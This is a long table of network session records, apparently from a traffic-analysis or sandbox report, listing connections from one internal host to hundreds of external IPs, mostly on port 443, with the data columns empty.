                                                19027192.168.2.2350454174.54.137.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19028192.168.2.233957241.201.250.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19029192.168.2.2334932205.196.186.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19030192.168.2.234107444.116.111.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19031192.168.2.2344146149.223.48.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19032192.168.2.2333570105.191.176.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19033192.168.2.2352690161.198.173.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19034192.168.2.234731038.8.105.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19035192.168.2.2353752184.196.74.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19036192.168.2.2354114114.77.104.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19037192.168.2.235329297.90.244.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19038192.168.2.2339638164.231.203.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19039192.168.2.2339424154.226.92.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19040192.168.2.2356382106.134.25.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19041192.168.2.2355974168.174.3.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19042192.168.2.2339878180.151.14.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19043192.168.2.2335944156.220.10.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19044192.168.2.233506644.18.254.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19045192.168.2.233474214.225.29.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19046192.168.2.235054868.163.9.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19047192.168.2.2348504164.74.30.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19048192.168.2.2360570118.81.240.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19049192.168.2.2347718177.171.31.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19050192.168.2.2337018158.55.218.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19051192.168.2.2343798145.117.22.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19052192.168.2.235987460.56.113.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19053192.168.2.2346194179.209.144.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19054192.168.2.2354580209.242.172.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19055192.168.2.23461144.190.107.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19056192.168.2.233625076.142.164.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19057192.168.2.235217268.2.171.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19058192.168.2.233511652.100.195.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19059192.168.2.2349202157.201.103.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19060192.168.2.2358740191.88.7.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19061192.168.2.235626279.77.243.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19062192.168.2.2347342211.139.157.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19063192.168.2.234331031.251.151.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19064192.168.2.2354212220.218.121.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19065192.168.2.2339102129.245.217.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19066192.168.2.2341964129.53.197.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19067192.168.2.233362479.181.89.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19068192.168.2.2350458108.100.219.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19069192.168.2.235485212.151.32.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19070192.168.2.2343112197.250.253.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19071192.168.2.233843664.237.5.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19072192.168.2.234510273.145.36.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19073192.168.2.2336356140.81.14.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19074192.168.2.2356720197.138.153.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19075192.168.2.2343454154.85.240.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19076192.168.2.234467834.191.19.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19077192.168.2.234310489.253.0.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19078192.168.2.2344918110.147.240.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19079192.168.2.2351500198.152.0.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19080192.168.2.235749094.111.194.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19081192.168.2.233580661.23.241.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19082192.168.2.234373661.101.2.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19083192.168.2.2340448195.61.159.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19084192.168.2.2351352125.23.42.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19085192.168.2.2351238161.253.91.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19086192.168.2.233717682.50.30.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19087192.168.2.2342498121.29.138.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19088192.168.2.2336144191.94.109.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19089192.168.2.2351120100.197.222.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19090192.168.2.2350762142.103.95.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19091192.168.2.2354178184.39.144.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19092192.168.2.2359682128.248.254.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19093192.168.2.233442475.220.157.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19094192.168.2.234828451.170.31.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19095192.168.2.2348648137.236.200.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19096192.168.2.235502674.242.202.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19097192.168.2.235311299.195.95.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19098192.168.2.2354914160.118.185.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19099192.168.2.2340152133.27.254.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19100192.168.2.234606058.18.77.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19101192.168.2.234195225.2.52.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19102192.168.2.2337244183.104.85.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19103192.168.2.2333532112.178.2.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19104192.168.2.2358278208.0.51.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19105192.168.2.2344444194.139.208.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19106192.168.2.2340296184.223.204.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19107192.168.2.2351954194.64.253.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19108192.168.2.233508060.171.171.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19109192.168.2.234441814.117.121.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19110192.168.2.2339344221.153.52.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19111192.168.2.2351720188.205.226.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19112192.168.2.233844469.67.117.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19113192.168.2.234472439.47.19.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19114192.168.2.2343834115.202.145.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19115192.168.2.2342782165.39.187.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19116192.168.2.234070841.76.97.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19117192.168.2.2353452118.94.76.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19118192.168.2.23463368.40.104.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19119192.168.2.2351310139.127.76.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19120192.168.2.2345988174.227.249.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19121192.168.2.235362412.252.103.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19122192.168.2.235776282.210.100.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19123192.168.2.2360656102.175.31.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19124192.168.2.235403272.64.125.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19125192.168.2.2357174179.159.7.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19126192.168.2.2339298179.15.80.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19127192.168.2.2353590189.180.231.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19128192.168.2.235738072.215.173.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19129192.168.2.2356806156.130.133.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19130192.168.2.2357530202.245.190.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19131192.168.2.234686038.208.187.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19132192.168.2.234501099.104.190.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19133192.168.2.2353686182.14.10.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19134192.168.2.2333940140.221.100.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19135192.168.2.2350024138.43.126.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19136192.168.2.23462844.234.212.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19137192.168.2.2349590100.182.70.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19138192.168.2.233585896.211.221.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19139192.168.2.2342222164.58.57.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19140192.168.2.2349612102.140.102.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19141192.168.2.2356348141.143.167.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19142192.168.2.2347088128.10.47.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19143192.168.2.233610090.252.178.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19144192.168.2.2332852196.76.32.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19145192.168.2.2357262208.95.31.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19146192.168.2.2338088130.227.253.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19147192.168.2.235411895.5.125.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19148192.168.2.2359782134.88.184.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19149192.168.2.234324825.175.47.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19150192.168.2.235577273.46.118.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19151192.168.2.2339414185.150.251.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19152192.168.2.2347876173.216.55.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19153192.168.2.2354792177.70.146.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19154192.168.2.235002281.175.138.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19155192.168.2.2343170182.239.58.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19156192.168.2.235272483.124.94.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19157192.168.2.2338362172.179.244.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19158192.168.2.2337120219.17.147.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19159192.168.2.2350218153.214.77.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19160192.168.2.2339964158.9.129.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19161192.168.2.2339258128.136.5.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19162192.168.2.2357688143.116.86.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19163192.168.2.2344024196.29.178.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19164192.168.2.2335978134.98.193.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19165192.168.2.2340528194.198.67.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19166192.168.2.2343610129.157.74.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19167192.168.2.2354550160.38.20.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19168192.168.2.233454046.110.223.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19169192.168.2.233708036.103.122.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19170192.168.2.2349230116.200.92.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19171192.168.2.235648862.93.205.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19172192.168.2.2350420190.242.62.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19173192.168.2.2343986118.118.132.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19174192.168.2.2355792100.245.21.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19175192.168.2.2345180147.220.156.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19176192.168.2.233842687.157.19.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19177192.168.2.2347808114.6.137.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19178192.168.2.2359192193.175.65.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19179192.168.2.2358364156.255.80.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19180192.168.2.2343114133.97.9.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19181192.168.2.2337700167.1.169.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19182192.168.2.2337538221.71.196.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19183192.168.2.234202867.162.37.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19184192.168.2.2352020161.159.26.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19185192.168.2.235664017.238.119.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19186192.168.2.234450492.157.47.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19187192.168.2.2355700188.107.179.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19188192.168.2.234468458.182.228.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19189192.168.2.2332946140.143.98.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19190192.168.2.2348698210.81.122.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19191192.168.2.234355838.254.170.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192192.168.2.235897839.138.52.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19193192.168.2.2341974107.39.111.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19194192.168.2.2351282163.89.203.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19195192.168.2.2349798170.63.134.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19196192.168.2.2345544114.174.42.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19197192.168.2.2335538165.111.205.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19198192.168.2.2333012169.105.107.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19199192.168.2.2359090110.87.247.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19200192.168.2.23532145.77.18.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19201192.168.2.2356978119.47.95.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19202192.168.2.2358916111.242.211.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19203192.168.2.234287696.53.37.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19204192.168.2.2347000168.157.231.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19205192.168.2.2334306121.122.145.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19206192.168.2.2359450118.93.63.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19207192.168.2.2348228150.54.192.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19208192.168.2.235274080.7.27.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19209192.168.2.2354196112.129.9.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19210192.168.2.235407841.73.14.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19211192.168.2.234108618.0.163.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19212192.168.2.234621073.169.224.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19213192.168.2.2346330167.144.123.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19214192.168.2.233434091.68.55.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19215192.168.2.235692275.154.142.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19216192.168.2.2355996117.12.135.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19217192.168.2.2342794135.35.229.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19218192.168.2.2350816163.249.4.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19219192.168.2.233948414.54.147.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19220192.168.2.235204248.167.112.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19221192.168.2.2333808117.5.50.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19222192.168.2.23344481.29.196.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19223192.168.2.235029013.231.216.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19224192.168.2.234712652.218.96.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19225192.168.2.2346964116.59.151.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19226192.168.2.235316284.110.30.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19227192.168.2.2345990107.255.245.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19228192.168.2.235963657.185.130.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19229192.168.2.2334698169.46.11.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19230192.168.2.2337312187.92.49.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19231192.168.2.2352484190.166.31.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19232192.168.2.2355136133.213.96.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19233192.168.2.2359208145.201.95.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19234192.168.2.233850441.232.240.9237215
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19235192.168.2.2338566220.3.143.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19236192.168.2.2357734179.69.27.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19237192.168.2.2333388129.77.86.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19238192.168.2.2346068102.98.14.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19239192.168.2.2349674106.154.77.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19240192.168.2.234140075.180.199.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19241192.168.2.2348594126.61.103.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19242192.168.2.233913835.164.26.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19243192.168.2.235287053.209.204.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19244192.168.2.233397812.38.142.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19245192.168.2.2358596149.232.252.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19246192.168.2.2350352219.139.96.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19247192.168.2.2355170160.157.103.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19248192.168.2.234465086.93.250.201443
                                                TimestampBytes transferredDirectionData


